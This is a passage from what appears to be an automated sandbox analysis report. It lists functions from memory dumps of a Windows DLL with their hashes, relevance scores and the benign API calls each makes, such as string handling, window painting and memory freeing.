Instruction ID: 6d597c38a5045ecab34c24d6dc7e9a02177162ab5861000f7244661764de33fa
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 4F9153721080A34EE79956BE847403EFFF55E42AA130A0B9DE4F2CB1C9FD64D154DA63

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CA8B9, Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 5692f05929d938e33b71f09ea279a86da1925a8326ae64904304e3d2a793c97b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 5691607220D0A30EE78952BE857507EFEF65E42AA130A079ED4F3CA1C5EE94C554DE23

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CDC5D, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34c3861075aa4de1bf3042b2d0de859912512e09eeaeb822f96554573754cfa4
Instruction ID: 579109307c667905997c7dd65a4d658c6388340d27b7fb1a5bd8ebd6ec5438c3
Opcode Fuzzy Hash: 34c3861075aa4de1bf3042b2d0de859912512e09eeaeb822f96554573754cfa4
Instruction Fuzzy Hash: 89616971AC03066ADA50BAE888A1BBE73ACDF96F08F004D1AD846DB7C0D741D9428F57

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CA60F, Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 47757a362c6352c1a48c3e932c18edc7386a9379a9a8fd775681d765d14fac5c
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: BE81B13260D0A34EE78952BE857407EFFF55E42AA130A079DD4F3CA1C5FEA4C195DA22

Uniqueness

Uniqueness Score: -1.00%

Function 0105D6A7, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction ID: 1043f53286899de8bacc0cd7b45daa62c376831ccc9b5482586d7d28a0f36220
Opcode Fuzzy Hash: 73280ef74348667f9bb46682e7668155456b9c9d6ac80614f548d248d46e72e5
Instruction Fuzzy Hash: 3C5147725083018FD348CF25D48945BBBE0BBD8768F144A1EF8D9A6221D7B4CA4ACF87

Uniqueness

Uniqueness Score: -1.00%

Function 0104FD91, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction ID: 6f35018f2959c2ae4576f6f63418895aa71953d25470d2c937b45d28c8fdc738
Opcode Fuzzy Hash: 66096b10ebe646ef78f9f5ec0eb4e12ed5071ff11f6d2eb90a8d1a0851188ca9
Instruction Fuzzy Hash: 7A31BFB15083028BC314DF2AC48541FFFE5EBC8B68F448AADE4D9A7251C774DA09CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0104251C, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction ID: 908b388eef55669514f8c0ec059211419a73c055ba8380c99c34349096997297
Opcode Fuzzy Hash: 36e10174b51d4b30331d21f3fbdfa81fefeb3be805abc3d352bc035776b7cbd9
Instruction Fuzzy Hash: B33122B19083429BD354CF66D55801BBBE0FBC9718F148D5DF5E8A6210D3B8CA498F96

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B8A50, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction ID: 467dcbfbe738b03934efdde68457c863fc9e75def77518dd5d107d3f28aa9c80
Opcode Fuzzy Hash: 63cd241727f9c0d9023f636bee476899c3ad84106e3150bd46020c8d77d6044a
Instruction Fuzzy Hash: F321CF76A002159FDB64CF58D8C0A66BBF8FF4E210B1A01EADD49DB312D330E855CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9CA1F0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 52b88a539edb6fac8df2e1ca9bb8aa2d2be49b10cf60a3a8cf96cfe6c1885742
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: CF113B7720106343D2C095FED4B07A7A39DFFC6A347284379D0634B658C1A3E0459E03

Uniqueness

Uniqueness Score: -1.00%

Function 01057BB2, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction ID: c184f571fb2ee88fe90b3c545b94844d772d2e1767e61b8571c77e9c4403d3e9
Opcode Fuzzy Hash: 9bd7bbd5455baa35b3adc3414b0411bf87c5a60660d83f3599a5aea9db5232a0
Instruction Fuzzy Hash: E3213775D01208FBEB48DFA5D84A8EEBBB2EB40240F14C199E525AB280D7B55B11CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B6510, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction ID: c09d97fd6fafa1e388d3006948f90da428b695e22d2a51b1fcf05ee9d5300f53
Opcode Fuzzy Hash: 78b5981a7cfa12a90d6dacec9a1ea9faca388e5f667b79ceaea35c536865e24c
Instruction Fuzzy Hash: B4E0E6366266618FDF95CB48F450A5F73B4EF40B10B4608A9E815CBA1AC3B0F951C990

Uniqueness

Uniqueness Score: -1.00%

Function 0105DE10, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415198092.0000000001040000.00000040.00000001.sdmp, Offset: 01040000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B13F0, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction ID: 513b67be4edd1d986e0762750fbffddf320f0749b097b682cc1280866c81d57a
Opcode Fuzzy Hash: d2befc1eb188f7f01c2c7bf3db9af76b10d7073361dd05215cd61d8924f7506b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E9B9BA0, Relevance: 40.7, APIs: 20, Strings: 3, Instructions: 424memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E9B9CDA
VariantCopy.OLEAUT32(?,?), ref: 6E9B9CE8
SysFreeString.OLEAUT32(00000000), ref: 6E9B9D30
SysFreeString.OLEAUT32(-00000001), ref: 6E9B9DC2
VariantClear.OLEAUT32(?), ref: 6E9B9DF7
SysFreeString.OLEAUT32(-00000001), ref: 6E9B9E16
SysFreeString.OLEAUT32(00000000), ref: 6E9B9E47
SysFreeString.OLEAUT32(00000000), ref: 6E9B9E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E9B9EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9B9EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E9B9F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E9B9F28
SysFreeString.OLEAUT32(00000000), ref: 6E9B9F37
SysFreeString.OLEAUT32(00000000), ref: 6E9B9FBB
SysFreeString.OLEAUT32(00000000), ref: 6E9B9FFF
_com_issue_error.COMSUPP ref: 6E9BA041
_com_issue_error.COMSUPP ref: 6E9BA04B
_com_issue_error.COMSUPP ref: 6E9BA051
_com_issue_error.COMSUPP ref: 6E9BA05B
SysFreeString.OLEAUT32(76AFD5B0), ref: 6E9BA061

Strings

!, xrefs: 6E9BA00A
lines, xrefs: 6E9B9EDB, 6E9B9F02
offsetY, xrefs: 6E9B9CF6

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: ad81b93131c92c7adbce254343b9e8cbf6672a95d301c96bd02284c7fbeb2b12
Instruction ID: 95f01aa4cd80468c8651ea88adda8d404e4d91aaabd0b808d1bab0b90c9df9e1
Opcode Fuzzy Hash: ad81b93131c92c7adbce254343b9e8cbf6672a95d301c96bd02284c7fbeb2b12
Instruction Fuzzy Hash: 6AF18AB0A0020ADFEB11DFE5C854BAFBBB8AF56718F104458E915BB280DB75E905CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C23F0, Relevance: 31.7, APIs: 21, Instructions: 183windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E9C24A3
GetParent.USER32(?), ref: 6E9C24AC
GetClientRect.USER32 ref: 6E9C24C2
CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
SelectObject.GDI32(00000000,?), ref: 6E9C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
SetBkMode.GDI32(?,00000001), ref: 6E9C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
GetClientRect.USER32 ref: 6E9C2556
ClientToScreen.USER32(?,?), ref: 6E9C2564
ClientToScreen.USER32(?,?), ref: 6E9C2579
ClientToScreen.USER32(?,?), ref: 6E9C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E9C25FD
SelectObject.GDI32(?,?), ref: 6E9C2608
SelectObject.GDI32(?,?), ref: 6E9C2613
DeleteObject.GDI32(?), ref: 6E9C261D
DeleteDC.GDI32(?), ref: 6E9C2624
EndPaint.USER32(?,?), ref: 6E9C2632

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 81cd590d90f9b390cdb0e68b3dc4ea7a69b6efbfc5c26899f983e4652267d05c
Instruction ID: 4ef6bbd8344bed31d86984b77169c1821d61442492505b3c10c4e99a491b5305
Opcode Fuzzy Hash: 81cd590d90f9b390cdb0e68b3dc4ea7a69b6efbfc5c26899f983e4652267d05c
Instruction Fuzzy Hash: DB613C71108B01AFDB209F64C908B6FBBF9FF99715F00491DF6A5922A4DB30A905CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6E9C2460, Relevance: 31.6, APIs: 21, Instructions: 141windowCOMMON

Download Yara Rule

APIs

BeginPaint.USER32(?,?), ref: 6E9C24A3
GetParent.USER32(?), ref: 6E9C24AC
GetClientRect.USER32 ref: 6E9C24C2
CreateCompatibleDC.GDI32(?), ref: 6E9C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E9C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E9C24F6
SelectObject.GDI32(00000000,?), ref: 6E9C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E9C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E9C252F
SetBkMode.GDI32(?,00000001), ref: 6E9C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E9C2544
GetClientRect.USER32 ref: 6E9C2556
ClientToScreen.USER32(?,?), ref: 6E9C2564
ClientToScreen.USER32(?,?), ref: 6E9C2579
ClientToScreen.USER32(?,?), ref: 6E9C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E9C25FD
SelectObject.GDI32(?,?), ref: 6E9C2608
SelectObject.GDI32(?,?), ref: 6E9C2613
DeleteObject.GDI32(?), ref: 6E9C261D
DeleteDC.GDI32(?), ref: 6E9C2624
EndPaint.USER32(?,?), ref: 6E9C2632

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 2f39da31a14fe477098bc6cef717964b35a683b164b5ff3829453d3504dbcfba
Instruction ID: 266b1075a98eccc24c0de3b10fe88f41ec7ce3a945e5d26c18c449547e23afcf
Opcode Fuzzy Hash: 2f39da31a14fe477098bc6cef717964b35a683b164b5ff3829453d3504dbcfba
Instruction Fuzzy Hash: 37511671108B41AFDB219F64C908F6EBBF9FF89710F00491DF6A592264EB31A905CF96

Uniqueness

Uniqueness Score: -1.00%

Function 6E9D7B6C, Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9D7BDC
_free.LIBCMT ref: 6E9D7BF2
_free.LIBCMT ref: 6E9D7C03
_free.LIBCMT ref: 6E9D7C14
_free.LIBCMT ref: 6E9D7C2B
GetCPInfo.KERNEL32(?,?), ref: 6E9D7C73

Part of subcall function 6E9DF178: _free.LIBCMT ref: 6E9DF1E3

_free.LIBCMT ref: 6E9D7E1F
_free.LIBCMT ref: 6E9D7E32
_free.LIBCMT ref: 6E9D7E40
_free.LIBCMT ref: 6E9D7E4B
_free.LIBCMT ref: 6E9D7E8D
_free.LIBCMT ref: 6E9D7E95
_free.LIBCMT ref: 6E9D7E9D
_free.LIBCMT ref: 6E9D7EA5
_free.LIBCMT ref: 6E9D7EB3

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 8d83593ada4d20778b1fcbbd2d63f2d59a0d428ba5b3405eff57a05ad5c14f3e
Instruction ID: f99eedd349aa2aca3fde9c975aab42472cb99f806ca2678751f230df6c8ed616
Opcode Fuzzy Hash: 8d83593ada4d20778b1fcbbd2d63f2d59a0d428ba5b3405eff57a05ad5c14f3e
Instruction Fuzzy Hash: D0B1BE71900B16AFDB108FA9C890BEEBBFCFF58304F148869E458A7291D775D8498F60

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BA080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,B5334A76,76AFD5B0,00000000), ref: 6E9BA124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E9BA132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,B5334A76,76AFD5B0,00000000), ref: 6E9BA14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E9BA170
SysFreeString.OLEAUT32(00000000), ref: 6E9BA17F
SysFreeString.OLEAUT32(00000000), ref: 6E9BA306
SysFreeString.OLEAUT32(00000000), ref: 6E9BA358
_com_issue_error.COMSUPP ref: 6E9BA366
SysFreeString.OLEAUT32(76AFD5B0), ref: 6E9BA36C

Strings

line, xrefs: 6E9BA11B, 6E9BA146
Arial, xrefs: 6E9BA195
8, xrefs: 6E9BA22F

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: ad7e28dcdee356583fd254768717419e6293f3d176b7c9b307bca602db836b7e
Instruction ID: 350972f00097f69b9f31619cdf3b2d78ed9780b829a161baf9b038396e9af3fa
Opcode Fuzzy Hash: ad7e28dcdee356583fd254768717419e6293f3d176b7c9b307bca602db836b7e
Instruction Fuzzy Hash: 52A1C270A04349DFEB10CFE4C848BAFBBB8AF55714F104558E915AB280DBB5EA44CF61

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6E9E2CE8

Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44DB
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44ED
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E44FF
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4511
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4523
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4535
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4547
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E4559
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E456B
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E457D
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E458F
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E45A1
Part of subcall function 6E9E44BE: _free.LIBCMT ref: 6E9E45B3

_free.LIBCMT ref: 6E9E2CDD

Part of subcall function 6E9D9B98: HeapFree.KERNEL32(00000000,00000000,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BAE
Part of subcall function 6E9D9B98: GetLastError.KERNEL32(6E9D6995,?,6E9D731A,000000FF,000000FF), ref: 6E9D9BC0

_free.LIBCMT ref: 6E9E2CFF
_free.LIBCMT ref: 6E9E2D14
_free.LIBCMT ref: 6E9E2D1F
_free.LIBCMT ref: 6E9E2D41
_free.LIBCMT ref: 6E9E2D54
_free.LIBCMT ref: 6E9E2D62
_free.LIBCMT ref: 6E9E2D6D
_free.LIBCMT ref: 6E9E2DA5
_free.LIBCMT ref: 6E9E2DAC
_free.LIBCMT ref: 6E9E2DC9
_free.LIBCMT ref: 6E9E2DE1

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 7b1a17f917d0531d2b6c49028c9d32682995fc3d87396cb48d6934478f9cbca2
Instruction ID: 438b9cc6c8ecf73308eeda55a9e9ae309c9419ba7b1d89188887bfbc8e6a7569
Opcode Fuzzy Hash: 7b1a17f917d0531d2b6c49028c9d32682995fc3d87396cb48d6934478f9cbca2
Instruction Fuzzy Hash: 6E314D32614B06AFEB529EB8D854BEA73ECBF50314F118819E658D7550DF74E8848F20

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E9E4604
_free.LIBCMT ref: 6E9E4628
_free.LIBCMT ref: 6E9E4635
_free.LIBCMT ref: 6E9E465A
_free.LIBCMT ref: 6E9E4667
_free.LIBCMT ref: 6E9E4670
_free.LIBCMT ref: 6E9E494E
_free.LIBCMT ref: 6E9E4956

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 088245bf02b639cbd457ee0a441cf1480644eb506e03738f967346e041e25a81
Instruction ID: 12bc7ec463afbc6391919983fc020c3409f9208a9b9436a8c6e11374af6c1fc7
Opcode Fuzzy Hash: 088245bf02b639cbd457ee0a441cf1480644eb506e03738f967346e041e25a81
Instruction Fuzzy Hash: ABC15FB6D40614AFDB20CAE8CC82FDA77FCAF59715F148455EA08EB281E670D9458FA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E9BF070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6E9BEEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,B5334A76,00000000,00000000), ref: 6E9BEEEE
Part of subcall function 6E9BEEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E9BEF1B
Part of subcall function 6E9BEEB0: CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF34
Part of subcall function 6E9BEEB0: CharNextW.USER32(7691EEF0,?,?,00000000), ref: 6E9BEF3F
Part of subcall function 6E9BEEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E9BEFAE

lstrcmpiW.KERNEL32(?,6E9F8A28,?,B5334A76,C000008C,00000000,?,?,00000000,6E9E9BA6,000000FF,?,6E9C00F7,00000000,00000000,C000008C), ref: 6E9BF0F3
lstrcmpiW.KERNEL32(?,6E9F8A2C,?,6E9C00F7,00000000,00000000,C000008C,C000008C), ref: 6E9BF10A

Memory Dump Source

Source File: 00000000.00000002.415594585.000000006E9B1000.00000020.00020000.sdmp, Offset: 6E9B0000, based on PE: true

Associated: 00000000.00000002.415587690.000000006E9B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415639399.000000006E9EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.415675490.000000006E9FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.415694970.000000006EA02000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: 7f05328101c5f8b14bf5f3885d4099f1780610762b07cbfbb2ff909cf312b2d1
Instruction ID: 61ec98eb8aef5768a2a89fa77902a7d24d63d55f5a3cf112c24e646679349d31
Opcode Fuzzy Hash: 7f05328101c5f8b14bf5f3885d4099f1780610762b07cbfbb2ff909cf312b2d1
Instruction Fuzzy Hash: 0BD1C279900219DADB25CFA4CC48BEEB3B9AF58318F1104D9EA09A7241D770EE59CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E9DBE31, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6E9DA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E9CED16,6E9FD0A0,0000000C,00000004,00000001,00000004,?,6E9B4865,00000000,00000000), ref: 6E9DA298
Part of subcall function 6E9DA294: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E9B4865,00000000,00000000), ref: 6E9DA33C
Part of subcall function 6E9DA294: _abort.LIBCMT ref: 6E9DA342

